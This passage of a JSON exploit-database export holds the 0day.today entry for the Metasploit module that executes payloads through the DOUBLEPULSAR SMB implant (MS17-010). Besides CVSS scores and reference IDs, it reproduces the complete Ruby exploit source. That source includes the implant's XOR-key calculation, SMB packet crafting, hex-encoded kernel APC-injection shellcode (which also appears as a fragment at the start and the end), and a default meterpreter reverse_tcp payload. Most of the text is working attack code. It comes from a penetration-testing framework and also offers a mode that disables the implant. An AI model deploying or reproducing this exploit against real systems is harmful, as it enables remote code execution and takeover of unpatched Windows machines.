\"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-26] #"}, "lastseen": "2021-10-26T08:21:53", "differentElements": ["sourceData"], "edition": 56}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "3c158095563da9d2437f866e439a2a71", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-26T22:29:31", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27802", 
"1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-29702"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96709", "SMNTC-96706", "SMNTC-96707", "SMNTC-96703", "SMNTC-96705"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", 
"TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-26T22:29:31", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-26T22:29:31", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => 
{\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n 